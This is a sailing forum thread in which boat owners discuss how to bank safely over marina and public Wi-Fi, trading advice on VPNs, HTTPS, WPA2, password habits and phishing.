Secure Wi-fi ?

S

Suspicious Behavior

.
Sep 18, 2016
25
Beneteau Oceana 31 Orange Beach Al
This question is more for those who live aboard full or part time.

Where are you certain you have secure wi-if ? I know everyone likes to check on the checking accounts, IRAS, 401Ks , or Trade Stocks.

How do you do that securely ?
 
dziedzicmj

dziedzicmj

.
Aug 13, 2012
533
Catalina 270 Ottawa
If you are using a "public" Wi-Fi use a VPN; this is the only reasonably safe-proof method of ensuring that nobody is snooping. If you are using a professional hot spot, with security, it should be configured in such a way that it own't allow anyone else on the wireless network to see the neighbours. Of course, the question is, if it is. So A VPN is a solution, as well. There is a number of free public VPN out there (top three, I think, are ExpressVPN, HideMyAss (sorry, this is a real name) and NordVPN). If you are outside of North America (well, US and Canada), you may have to look for something else.

If you are doing banking, you are using a secure connection (SSL) (if you don't, change the bank; seriously), so all the traffic is encrypted. Your much bigger worry is all the other traffic - email, web browsing etc. Many email packages don't use encryption, so even if your login (and password) is encrypted, your emails aren't. Someone could, at least theoretically, read your emails along with you. Or, which might be even worse, one might try installing some malware on your computer.

If you spend most of your Internet life on a public or unknown hotspot, you might want to explore a personal firewall solution (e.g. ZoneAlarm, Comodo, Kaspersky). It won't protect you from snooping, but it would protect you from most of the malware.

And keep in mind that security and convenience (ease of use) are the opposite ends of the scale. The more secure your solution is, the more inconvenient it is in daily use. Nothing is free.

Good luck

Marek
 
  • Like
Likes: Gunni and JamesG161
LeslieTroyer

LeslieTroyer

.
May 20, 2016
3,015
Catalina 36 MK1 94 Everett, WA
hot spots are not secure - you are still vulnerable while the devices are setting up the VPN or encrypted connection.
 
Meriachee

Meriachee

.
Aug 1, 2011
3,972
Catalina 270 255 Wabamun. Welcome to the marina
and further to that, login and password data is not usually passed through a vpn until the tunnel is established, so using that kind of facility is not really vulnerable to a person grabbing random wire shark captures, and the better vpn products use a token authentication, and good luck reading that.
 
Brian S

Brian S

.
Nov 9, 2012
2,500
Oday 192 Lake Nockamixon
An important consideration of wifi is that it is a hub-type of network connection. All traffic goes to all attached machines. When you are at home, you are reasonably secure if your network password uses WPA in order to connect to the wifi network. One would expect that the only devices on your home network are your devices.

But when you are connected to any other wifi network, even if you log in with a WPA password, all your data transmission is visible to all devices on that network. So, for your marina, anyone else on the marina's wifi network can see your network data.

This is why a VPN service is useful. It makes a connection between your device and the service's server, and all the data that goes back and forth is encrypted. So, in our marina wifi network example, other devices would only see unreadable encrypted information on the network.

If you use Android devices, there was a recent report that a significant portion of the VPN apps available for purchase for Android doesn't actually encrypt data at all. So, you have to be careful that you are using a reputable service.

Some home wifi routers have a VPN feature built in. My Netgear does, using OpenVPN. In this scenario, I could use an OpenVPN client on my computer to make an encrypted connection to my router at home, again masking my data from other devices on an untrusted Wifi network. Given that, there is an OpenVPN client for my Mac, but there is no OpenVPN client for my iPhone or iPad.
 
capta

capta

.
Jun 4, 2009
4,907
Pearson 530 Admiralty Bay, Bequia SVG
I'm always concerned when there is "free" public access to wifi down here. Nothing is free these days except the wind and the sunlight. I'd suspect that whoever set up and offers "free" wifi has done it to try to collect sensitive information.
 
njlarry

njlarry

.
Sep 23, 2009
1,475
O'Day 34-At Last Rock Hall, Md
For us simple lay people, what is VPN, SSL and WPA?
And how does a person know if it is on?
Thank you.
 
justsomeguy

justsomeguy

.
Feb 20, 2011
8,048
Island Packet 35 Tucson, AZ/San Carlos, MX
njlarry said:
For us simple lay people, what is VPN, SSL and WPA?
And how does a person know if it is on?
Thank you.
Click to expand
Virtual Private Network
Secure Sockets Layer
Works Progress Administration WiFi Protected Access.

Perhaps someone else could chime in on how one might know it's on.
 
A

alexco38

.
Sep 25, 2008
1,096
CS 30 Toronto
Our club WiFi uses "commercial grade" routers and access points. It's secure with WPA2-PSK so all user must enter password. Guest is enabled but still require password and WPA2-PSK only with reduced bandwidth.
Firewall and NAT are pretty tight and not use default IP address for DHCP either. No remote access to any vital gear.

If you use "free" WiFi, you are open. Only use it to look up restaurant and shop etc. Never email or banking.
 
tjar

tjar

.
Aug 8, 2011
166
Hunter Legend 35.5 Tacoma, WA
As others have pointed out, using SSL (evidenced by "https:" in the address) for connections to your bank and other sensitive sites is usually sufficient. A VPN connection from your device to a VPN service provider will also secure your connection over the local WiFi network to the server, but anything beyond the VPN server is not encrypted. A disreputable VPN provider or anybody with access to the other side of their server can then intercept your traffic. Using SSL through the VPN will resolve that problem since SSL is secure end to end.
Email is another problem though. Unless your email connection is also secured using TLS/SSL, emails are the equivalent of sending a postcard that anybody can read along the way. My email client automatically sets up a secure connection whenever I log into my account. That's sufficient for everyday emails, but if I'm sending sensitive info such as Social Security numbers, bank account numbers, or passwords, I encrypt it further using PGP or ProtonMail.
If you're not comfortable with all of this security stuff, using a cellular connection instead of WiFi should set your mind at ease. Although not totally secure either, it's much harder and more expensive to tap into a cellular connection.
 
C

CarlN

.
Jan 4, 2009
603
Ketch 55 Bristol, RI
A lot of this advice is out of date for the OP's question. Every bank and financial site uses SSL (you know that because the address will start with "https:" not "http:"). SSL is almost impossible to break. There are rumors that the NSA can do it given enough supercomputers. As mentioned, Wifi security is an issue for lots of other things but not for financial institutions.

But SSL makes no difference if someone learns your password. Virtually all computer crime happens today by stolen passwords. While there are a tiny number of exceptions, almost every password theft happens for one of the following reasons:

1. You use the same password on several sites. It's somehow stolen from one company and then sold on the internet to be tried at every other site with your email address.

2. You use an easy to break password. Try this site for. https://howsecureismypassword.net

3. They change your password by guessing your security question to reset your password. "What was your first car?" is my favorite. There are only about 50 cars and even fewer names that would be someone's "First car". The hacker just keeps trying until he gets it and can change the password. Obviously, the fix is to not use a real car - go with something like "Lettuce" .

4. You get tricked by a phishing email and click on a link in the email that either installs software on your computer to steal passwords or tricks them into typing their password into a fake site. A lot of the phishing emails are very, very convincing. Instead of clicking on the link, use your normal way to go to the site (e.g. Google or bookmark).

The greatest recent improvement is that most financial sites will send an SMS code to your phone if someone wants to log in from a new computer or tries to change the password. If offered, use this service. It's very hard to circumvent.
 
Last edited:
Meriachee

Meriachee

.
Aug 1, 2011
3,972
Catalina 270 255 Wabamun. Welcome to the marina
njlarry said:
For us simple lay people, what is VPN, SSL and WPA?
And how does a person know if it is on?
Click to expand
The simple answer is, if you are on a public network, which includes ANY "free" wifi, assume you are NOT safe. This clearly means, do not use the network at the coffee shop to check your bank statement under any circumstances. You will eventually find out that it wasn't safe, but only after you next check your bank balance, or what's left of it.
 
Meriachee

Meriachee

.
Aug 1, 2011
3,972
Catalina 270 255 Wabamun. Welcome to the marina
We stayed at a hotel in Vancouver BC a few years ago, and while connected to the free hotel wifi, I found a NAS server (a hard drive) on the network, and this particular box didn't have any passwords and happened to contain the backup for the hotel's PMS (Property Management System) It took all of 10 minutes to craft a screen shot of yesterdays financials, and send it to the front desk printer. Needless to say they were speechless.
If this stuff can be found by casual viewing, consider what somebody intent on stealing your info can do.
 
LeslieTroyer

LeslieTroyer

.
May 20, 2016
3,015
Catalina 36 MK1 94 Everett, WA
Several years ago I took CISSP and Ethical Hacking courses and there is a very good reason security folks don't like wireless. All the vpn wpa wpa2 and ssh won't matter if the hackers can intercept or spoof the first interactions between you and the wireless network.
 
  • Like
Likes: justsomeguy
Brian S

Brian S

.
Nov 9, 2012
2,500
Oday 192 Lake Nockamixon
alexco38 said:
Our club WiFi uses "commercial grade" routers and access points. It's secure with WPA2-PSK so all user must enter password. Guest is enabled but still require password and WPA2-PSK only with reduced bandwidth.
Firewall and NAT are pretty tight and not use default IP address for DHCP either. No remote access to any vital gear.
Click to expand
None of this means any data traveling on the wifi network from your computer out to the internet is secure. Wifi Protected Access v. 2 with Pre-Shared Key (WPA2-PSK) is only a way to ensure people that should be able to get onto the network can get onto the network. The Pre-shared key is basically a (hopefully) reasonable complex password to allow your device on the network. Once your device is on that wifi network, all other devices on that network can see your data. Obviously, one hopes that no one else who is a member of your club, and who has the Pre-Shared Key (password) to the club's network would actually sit there and sniff the network traffic... so... you could be reasonably safe. However, someone who is data paranoid would not find that to be adequate security for their data.

With regards to JustSomeGuy's question, a VPN is a Virtual Private Network. It is a Virtual network, because it is not a direct network connection, it's a network connection that runs over the internet. It is Private because all data between your device and the target network endpoint is encrypted, so no one else can see the data, they can just see that network packets are going back and forth. And, it's a Network, because it carries your data back and forth to the endpoint.

Your wired cable or FiOS connection from your house to Comcast or Verizon or Time Warner is a direct network connection. Or, with some companies, the connection from regional office to home office might be a direct network connection that the company pays for from a service provider. Used to be a T1 was a direct connection between two locations, but that's slow tech nowadays. On the other end, you could be connecting to a router, or a server, or whatever that creates a secure connection to your device, so it can kinda "tunnel" through the interwebs to move your data back and forth. You could have a field office that has a network device that creates this encrypted network "tunnel" to another network device at the home office. Or, you could have VPN software such as Cisco AnyConnect on your laptop, which creates this encrypted connection to the VPN device at your company. Or you could roll your own MacOS X server (or Windows server, or Linux server) at home, which allows your computer to make a secure VPN connection when you're out in the public world at large.
 
You must log in or register to reply here.

Top Bottom